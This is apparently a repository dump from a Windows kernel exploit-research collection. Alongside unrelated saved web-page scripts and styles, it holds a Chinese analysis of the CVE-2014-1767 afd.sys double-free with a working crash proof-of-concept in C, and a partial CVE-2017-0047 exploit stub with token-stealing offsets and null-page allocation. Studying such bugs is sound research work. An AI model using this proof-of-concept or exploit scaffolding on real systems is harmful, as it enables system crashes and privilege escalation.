https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/copycode.gif -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/2/CVE-2014-1767 利用分析(2015.2) - 會飛的貓 - 博客园_files/encoder.js.下载: -------------------------------------------------------------------------------- 1 | Encoder={EncodeType:"entity",isEmpty:function(a){return a?a===null||a.length==0||/^\s+$/.test(a):true},arr1:[" ","¡","¢","£","¤","¥","¦","§","¨","©","ª","«","¬","­","®","¯","°","±","²","³","´","µ","¶","·","¸","¹","º","»","¼","½","¾","¿","À","Á","Â","Ã","Ä","Å","Æ","Ç","È","É","Ê","Ë","Ì","Í","Î","Ï","Ð","Ñ","Ò","Ó","Ô","Õ","Ö","×","Ø","Ù","Ú","Û","Ü","Ý","Þ","ß","à","á","â","ã","ä","å","æ","ç","è","é","ê","ë","ì","í","î","ï","ð","ñ","ò","ó","ô","õ","ö","÷","ø","ù","ú","û","ü","ý","þ","ÿ",""","&","<",">","Œ","œ","Š","š","Ÿ","ˆ","˜"," "," "," ","‌","‍","‎","‏","–","—","‘","’","‚","“","”","„","†","‡","‰","‹","›","€","ƒ","Α","Β","Γ","Δ","Ε","Ζ","Η","Θ","Ι","Κ","Λ","Μ","Ν","Ξ","Ο","Π","Ρ","Σ","Τ","Υ","Φ","Χ","Ψ","Ω","α","β","γ","δ","ε","ζ","η","θ","ι","κ","λ","μ","ν","ξ","ο","π","ρ","ς","σ","τ","υ","φ","χ","ψ","ω","ϑ","ϒ","ϖ","•","…","′","″","‾","⁄","℘","ℑ","ℜ","™","ℵ","←","↑","→","↓","↔","↵","⇐","⇑","⇒","⇓","⇔","∀","∂","∃","∅","∇","∈","∉","∋","∏","∑","−","∗","√","∝","∞","∠","∧","∨","∩","∪","∫","∴","∼","≅","≈","≠","≡","≤","≥","⊂","⊃","⊄","⊆","⊇","⊕","⊗","⊥","⋅","⌈","⌉","⌊","⌋","⟨","⟩","◊","♠","♣","♥","♦"],arr2:[" ","¡","¢","£","¤","¥","¦","§","¨","©","ª","«","¬","­","®","¯","°","±","²","³","´","µ","¶","·","¸","¹","º","»","¼","½","¾","¿","À","Á","Â","Ã","Ä","Å","Æ","Ç","È","É","Ê","Ë","Ì","Í","Î","Ï","Ð","Ñ","Ò","Ó","Ô","Õ","Ö","×","Ø","Ù","Ú","Û","Ü","Ý","Þ","ß","à","á","â","ã","ä","å","æ","ç","è","é","ê","ë","ì","í","î","ï","ð","ñ","ò","ó","ô","õ","ö","÷","ø","ù","ú","û","ü","ý","þ","ÿ",""","&","<",">","Œ","œ","Š","š","Ÿ","ˆ","˜"," "," "," ","‌","‍","‎","‏","–","—","‘","’","‚","“","”","„","†","‡","‰","‹","›","€","ƒ","Α","Β","Γ","Δ","Ε","Ζ","Η","Θ","Ι","Κ","Λ","Μ","Ν","Ξ","Ο","Π","Ρ","Σ","Τ","Υ","Φ","Χ","Ψ","Ω","α","β","γ","δ","ε","ζ","η","θ","ι","κ","λ","μ","ν","ξ","ο","π","ρ","ς","σ","τ","υ","φ","χ","ψ","ω","ϑ","ϒ","ϖ","•","…","′","″","‾","⁄","℘","ℑ","ℜ","™","ℵ","←","↑","→","↓","↔","↵","⇐","⇑","⇒","⇓","⇔","∀","∂","∃","∅","∇","∈","∉","∋","∏","∑","−","∗","√","∝","∞","∠","∧","∨","∩","∪","∫","∴","∼","≅","≈","≠","≡","≤","≥","⊂","⊃","⊄","⊆","⊇","⊕","⊗","⊥","⋅","⌈","⌉","⌊","⌋","〈","〉","◊","♠","♣","♥","♦"],HTML2Numerical:function(a){return this.swapArrayVals(a,this.arr1,this.arr2)},NumericalToHTML:function(a){return this.swapArrayVals(a,this.arr2,this.arr1)},numEncode:function(c){if(this.isEmpty(c))return"";for(var d="",b=0;b"~")a="&#"+a.charCodeAt()+";";d+=a}return d},htmlDecode:function(e){var c,b,a=e;if(this.isEmpty(a))return"";a=this.HTML2Numerical(a);arr=a.match(/&#[0-9]{1,5};/g);if(arr!=null)for(var d=0;d=-32768&&c<=65535)a=a.replace(b,String.fromCharCode(c));else a=a.replace(b,"")}return a},htmlEncode:function(a,b){if(this.isEmpty(a))return"";b=b||false;if(b)if(this.EncodeType=="numerical")a=a.replace(/&/g,"&");else a=a.replace(/&/g,"&");a=this.XSSEncode(a,false);if(this.EncodeType=="numerical"||!b)a=this.HTML2Numerical(a);a=this.numEncode(a);if(!b){a=a.replace(/&#/g,"##AMPHASH##");if(this.EncodeType=="numerical")a=a.replace(/&/g,"&");else a=a.replace(/&/g,"&");a=a.replace(/##AMPHASH##/g,"&#")}a=a.replace(/&#\d*([^\d;]|$)/g,"$1");if(!b)a=this.correctEncoding(a);if(this.EncodeType=="entity")a=this.NumericalToHTML(a);return a},XSSEncode:function(a,b){if(!this.isEmpty(a)){b=b||true;if(b){a=a.replace(/\'/g,"'");a=a.replace(/\"/g,""");a=a.replace(//g,">")}else{a=a.replace(/\'/g,"'");a=a.replace(/\"/g,""");a=a.replace(//g,">")}return a}else return""},hasEncoded:function(a){return/&#[0-9]{1,5};/g.test(a)?true:/&[A-Z]{2,6};/gi.test(a)?true:false},stripUnicode:function(a){return a.replace(/[^\x20-\x7E]/g,"")},correctEncoding:function(a){return a.replace(/(&)(amp;)+/,"$1")},swapArrayVals:function(b,a,d){if(this.isEmpty(b))return"";var e;if(a&&d)if(a.length==d.length)for(var c=0,f=a.length;c 26 | * @copyright 2009 timbenniks.com 27 | * @version $Id: jquery.notice.js 1 2009-01-24 12:24:18Z timbenniks $ 28 | **/ 29 | (function(jQuery) 30 | { 31 | jQuery.extend({ 32 | noticeAdd: function(options) 33 | { 34 | var defaults = { 35 | inEffect: {opacity: 'show'}, // in effect 36 | inEffectDuration: 600, // in effect duration in miliseconds 37 | stayTime: 3000, // time in miliseconds before the item has to disappear 38 | text: '', // content of the item 39 | stay: false, // should the notice item stay or not? 40 | type: 'notice' // could also be error, succes 41 | } 42 | 43 | // declare varaibles 44 | var options, noticeWrapAll, noticeItemOuter, noticeItemInner, noticeItemClose; 45 | 46 | options = jQuery.extend({}, defaults, options); 47 | noticeWrapAll = (!jQuery('.notice-wrap').length) ? jQuery('
').addClass('notice-wrap').appendTo('body') : jQuery('.notice-wrap'); 48 | noticeItemOuter = jQuery('
').addClass('notice-item-wrapper'); 49 | noticeItemInner = jQuery('
').hide().addClass('notice-item ' + options.type).appendTo(noticeWrapAll).html('

'+options.text+'

').animate(options.inEffect, options.inEffectDuration).wrap(noticeItemOuter); 50 | noticeItemClose = jQuery('
').addClass('notice-item-close').prependTo(noticeItemInner).html('×').click(function() { jQuery.noticeRemove(noticeItemInner) }); 51 | 52 | // hmmmz, zucht 53 | if(navigator.userAgent.match(/MSIE 6/i)) 54 | { 55 | noticeWrapAll.css({top: document.documentElement.scrollTop}); 56 | } 57 | 58 | if(!options.stay) 59 | { 60 | setTimeout(function() 61 | { 62 | jQuery.noticeRemove(noticeItemInner); 63 | }, 64 | options.stayTime); 65 | } 66 | 67 | }, 68 | 69 | noticeRemove: function(obj) 70 | { 71 | obj.animate({opacity: '0'}, 200, function() 72 | { 73 | obj.parent().animate({height: '0px'}, 100, function() 74 | { 75 | obj.parent().remove(); 76 | }); 77 | }); 78 | } 79 | }); 80 | })(jQuery); -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/3/CVE-2014-1767 Afd.sys double-free vulnerability Analysis and Exploit - Binary Vuln Analysis - Vulnerability Analysis - SecNiu_files/style.css: -------------------------------------------------------------------------------- 1 | /* 2 | # Copyright (C) 2013 DMeng.net 3 | Theme Name: 多梦主题2014 4 | Theme URI: http://www.dmeng.net/dmeng-theme-2014.html 5 | Author: 多梦 6 | Author URI: http://www.dmeng.net/ 7 | Description: 多梦网络主题是一款拥有丰富语义网和个性化设置以及支持手机访问的响应式主题。当前版本是DMENG2014,在2014年01月15日发布。 8 | Version: 1.4.1 9 | Tags: 响应式主题,手机主题 10 | */ 11 | 12 | body { font-family:"Microsoft Yahei","冬青黑体简体中文 w3","宋体";white-space:normal;word-break:break-all;} 13 | h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6{ font-family:"Microsoft Yahei","冬青黑体简体中文 w3","宋体";} 14 | h1, .h1{font-size:24px;} 15 | h2, .h2{border-bottom: 1px solid #dadada;padding-bottom:5px;font-size:21px;} 16 | h3, .h3{font-size:20px;} 17 | p {line-height:22px;font-size:13px;} 18 | .alignleft {float:left;} .alignright {float:right;} .alignnone {float:none;} 19 | .clean {clear:both;} 20 | .site-title {margin:0;font-family:"Microsoft Yahei","冬青黑体简体中文 w3","宋体";} 21 | .site-title span{font-size:16px;} 22 | .mt20 {margin-top:20px;} 23 | .mb20 {margin-bottom:20px;} 24 | .mr10 {margin-right:10px;} 25 | .ml10 {margin-left:10px;} .ml5 {margin-left:5px;} 26 | code {white-space:normal;word-break:break-all;} 27 | blockquote {text-indent:0;border-left:10px solid #ccc;padding:15px 25px;background-color:#eee;display:block;} 28 | blockquote p{font-size:14px;line-height:24px;} 29 | .content {position:relative;z-index:999;} 30 | .content li{word-break:break-all;} 31 | .content p{margin-bottom:22px;font-size:15px;line-height:24px;} 32 | .content h3{font-weight:600px;} 33 | .content img{max-width:100%;} 34 | .searchResults strong{font-weight:normal;} 35 | .article_index {max-width:200px;padding-top:0 !important;padding-bottom:0 !important;} 36 | .stickyImg {width:100%;height:100px;overflow:hidden;} 37 | .stickyImg img {width:100%;} 38 | @media (max-width: 1200px) { 39 | .stickyImg {height:129px;overflow:hidden;} 40 | } 41 | @media (max-width: 992px) { 42 | .stickyImg {height:153px;overflow:hidden;} 43 | } 44 | @media (max-width: 767px) { 45 | .stickyImg {height:auto;} 46 | } 47 | .stickyContent {height:128px;overflow:hidden;margin-bottom:15px;} 48 | @media (max-width: 767px) { 49 | .stickyContent {height:auto;} 50 | } 51 | .stickyTitle {margin:5px 0 7px;} 52 | .stickyDesc p{margin-bottom:0;font-size:13px;} 53 | .indexCat .list-group-item span {display:block;height:20px;overflow:hidden;} 54 | .floatButton {position:fixed;top:50%;right:0;z-index:9999999;} 55 | .sidebar {position:relative;z-index:1;} 56 | .sidebar ul{padding:0;margin:10px;} 57 | .sidebar ul li{list-style:none;} 58 | .sidebar .list-group{padding:0;margin:0;} 59 | .panel{overflow:hidden;} 60 | .breadcrumb{margin-bottom:0;color:#999;} 61 | .breadcrumb a{color:#999;} 62 | .breadcrumb a:hover, a:focus{color:#2a6496;text-decoration:none;} 63 | .latestpostBox {padding-left:0;padding-right:0;} 64 | .latestpost p{margin-bottom:0;font-size:13px;color:#666;} 65 | .latestpost .thumbnail{width:220px;max-height:120px;float:left;margin:10px 15px 10px 0;} 66 | @media (max-width: 479px) { 67 | .latestpost .thumbnail{width:100%;max-height:500px;float:none;} 68 | } 69 | .latestpost .list-group-item{overflow:hidden;} 70 | .latestpost .h4{margin-top:10px;margin-bottom:10px;} 71 | .latestpost .sticky{background:#5cb85c;} 72 | .affix{top:0;padding-top:10px;background:#fff;} 73 | @media (max-width: 992px) { 74 | .affix{position:relative;} 75 | } 76 | footer {margin-top:30px;position:relative;z-index:999;} 77 | footer .panel-body .panel-body {padding:0;} 78 | @media (min-width: 992px) { 79 | .header-nav-right { 80 | display: none; 81 | } 82 | } 83 | @media (min-width: 1200px) { 84 | .header-nav-right { 85 | display: block; 86 | } 87 | } -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/Cve-2014-1767.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/Cve-2014-1767.rar -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.$$$: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.$$$ -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.id0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.id0 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.id1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.id1 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.id2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.id2 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.nam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.nam -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.sys -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd.til: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd.til -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/afd_1767_Exp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/afd_1767_Exp.zip -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/analysis.md: -------------------------------------------------------------------------------- 1 | ## 漏洞成因 2 | poc: 3 | 4 | #include 5 | #include 6 | #pragma comment(lib, “WS2_32.lib”) 7 | 8 | int main() 9 | { 10 | DWORD targetSize = 0×310 ; 11 | DWORD virtualAddress = 0×13371337 ; 12 | DWORD mdlSize=(0×4000*(targetSize-0×30)/8)-0xFFF-(virtualAddress& 0xFFF) ; 13 | static DWORD inbuf1[100] ; 14 | memset(inbuf1, 0, sizeof(inbuf1)) ; 15 | inbuf1[6] = virtualAddress ; 16 | inbuf1[7] = mdlSize ; 17 | inbuf1[10] = 1 ; 18 | static DWORD inbuf2[100] ; 19 | memset(inbuf2, 0, sizeof(inbuf2)) ; 20 | inbuf2[0] = 1 ; 21 | inbuf2[1] = 0x0AAAAAAA ; 22 | WSADATA WSAData ; 23 | SOCKET s ; 24 | sockaddr_in sa ; 25 | int ierr ; 26 | WSAStartup(0×2, &WSAData) ; 27 | s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ; 28 | memset(&sa, 0, sizeof(sa)) ; 29 | sa.sin_port = htons(135) ; 30 | sa.sin_addr.S_un.S_addr = inet_addr(“127.0.0.1″) ; 31 | sa.sin_family = AF_INET ; 32 | ierr = connect(s, (const struct sockaddr *)&sa, sizeof(sa)) ; 33 | static char outBuf[100] ; 34 | DWORD bytesRet ; 35 | DeviceIoControl((HANDLE)s, 0x1207F, (LPVOID)inbuf1, 0×30, outBuf, 0, &bytesRet, NULL); 36 | DeviceIoControl((HANDLE)s, 0x120C3, (LPVOID)inbuf2, 0×18, outBuf, 0, &bytesRet, NULL); 37 | return 0 ; 38 | } 39 | 40 | 整个漏洞的流程如下。 41 | 42 | POC创建了一个以socket为基础的本地网络连接,调用DeviceIoControl向socket对象分别发送两个控制码0x1207F和0x120C3,这两次控制码分别对应afd.sys的AfdTransmitFile和AfdTransmitPackets。 43 | 44 | ### IOControl=0x1207F(AfdTransmitFile) 45 | 46 | 1. AfdTransmitFile会调用AfdTliGetTpInfo来获得一个TpInfo结构 47 | 48 | 2. 接着AfdTransmitFile根据用户层传递过来的VirtualAddress=0x13371337和Length来创建一个Mdl,用来和用户层交互,并将这个Mdl的地址保存到TpInfo结构中的TpElementArray数组中。 49 | 50 | 3. AfdTransmitFile接着调用MmProbeAndLockPages函数,准备对申请的Mdl进行操作,但是由于无效的地址(VirtualAddress=0x13371337),程序进入到异常处理的流程中。 51 | 52 | 4. 异常处理流程会调用AfdReturnTpInfo函数,AfdReturnTpInfo函数遍历TpInfo结构的TpElementArray数组,将Mdl释放掉。接着其会调用ExFreeToNPagedLookasideList释放刚创建的TpInfo。 53 | 54 | 5. 但是因为此时这个Lookaside很"闲",ExFreeToNPagedLookasideList不会将TpInfo释放掉,而是将其挂载到Dedicated Lookaside List中去。但此时TpInfo所在pool数据还保留着,并没有清空,当然也包括已经释放掉的Mdl地址,成了一个dangling pointer,这里就埋下了隐患。这是第一次free的地方。 55 | 56 | 第一次IoControl的操作主要就是放置一个dangling pointer到Lookaside Lists中。 57 | 58 | 第二次IoControl对这个dangling pointer进行二次释放。 59 | 60 | 61 | ### IOControl=0x120C3(AfdTransmitPackets) 62 | 63 | 1. 接下来AfdTransmitPackets同样会调用AfdTliGetTpInfo创建一个TpInfo结构。AfdTliGetTpInfo会调用ExAllocateFromNPagedLookasideList。因为此时的Lookaside Lists不为空,所以会从中卸载一个ListEntry给TpInfo使用,而此时Lookaside就只有一个上一次AfdTransmitFile函数放入的ListEntry,所以这个ListEntry正好是响应上一个控制码所放进去的那个! 64 | 65 | 2. 接着AfdTliGetTpInfo会从用户层输入inbuf2[1]获得值0x0AAAAAAA,作为TpElementCount,接下来会创建一个0x0AAAAAAA*0x18=0xFFFFFFF0大小的pool,这显然太大了,所以会再一次的进去到异常处理的操作。 66 | 67 | 3. 异常处理会调用AfdReturnTpInfo,其会遍历TpInfo尝试释放掉Mdl。因为此时的TpInfo所在的pool正是" dangling pointer",而Mdl已经被释放过一次了,这时发生double-free。 68 | 69 | 4. 然后发生BSOD。 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2014-1767/cve-2014-1767_Afd.sys_double-free分析与利用.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2014-1767/cve-2014-1767_Afd.sys_double-free分析与利用.pdf -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2017-0047/exp.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #pragma comment(lib, "gdi32.lib") 5 | #pragma comment(lib, "user32.lib") 6 | 7 | #ifndef W32KAPI 8 | #define W32KAPI DECLSPEC_ADDRSAFE 9 | #endif 10 | 11 | 12 | 13 | #define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread 14 | #define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process 15 | #define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId 16 | #define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink 17 | #define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token 18 | #define SYSTEM_PID 0x004 // SYSTEM Process PID 19 | 20 | 21 | typedef NTSTATUS WINAPI NtAllocateVirtualMemory_t(IN HANDLE ProcessHandle, 22 | IN OUT PVOID *BaseAddress, 23 | IN ULONG ZeroBits, 24 | IN OUT PULONG AllocationSize, 25 | IN ULONG AllocationType, 26 | IN ULONG Protect); 27 | 28 | 29 | int main(int argc, char* argv[]) 30 | { 31 | HANDLE hProcess; 32 | DWORD dwPID = GetCurrentProcessId(); 33 | DWORD Virtual_BaseAddr = 1; 34 | SIZE_T RegionSize = 0x1000; 35 | 36 | hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, dwPID); 37 | NtAllocateVirtualMemory_t *NtAllocateVirtualMemory; 38 | NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t *)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); 39 | ULONG VirtualMemory_Result = NtAllocateVirtualMemory(hProcess, 40 | (LPVOID*)&Virtual_BaseAddr, 41 | 0, 42 | &RegionSize, 43 | MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, 44 | PAGE_EXECUTE_READWRITE); 45 | if (VirtualMemory_Result != 0x0) 46 | printf(" [!] Failed to allocate memory at BaseAddress, error: 0x%X\n", VirtualMemory_Result); 47 | else { 48 | printf(" [*] Allocated memory at BaseAddress"); 49 | } 50 | memset(0x0, 0, 0x1000); 51 | 52 | // void* bypass_one = (void *)0x590; 53 | // *(LPBYTE)bypass_one = 0x1; 54 | // void* bypass_two = (void *)0x592; 55 | // *(LPBYTE)bypass_two = 0x1; 56 | // void* jump_addr = (void *)0x748; 57 | // *(LPDWORD)jump_addr = (DWORD)TokenStealingShellcodeWin7; 58 | // Trigger_BSoDPoc(); 59 | // PopShell(); 60 | return 0; 61 | } -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2017-0047/know.md: -------------------------------------------------------------------------------- 1 | ba e1 0x93ccedcd 2 | 3 | ## ba 4 | 5 | ba 命令就是针对数据下断点的命令, 该断点在指定内存被访问时触发。 命令格式为 6 | 7 | ba Access Size [地址] 8 | 9 | Access 是访问的方式, 比如 e (执行), r (读/写), w (写) 10 | 11 | Size 是监控访问的位置的大小,以字节为单位。 值为 1、2或4,还可以是 8(64位机)。 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2017-0047/poc.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2017-0047/poc.zip -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2017-0047/win32k.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2017-0047/win32k.sys --------------------------------------------------------------------------------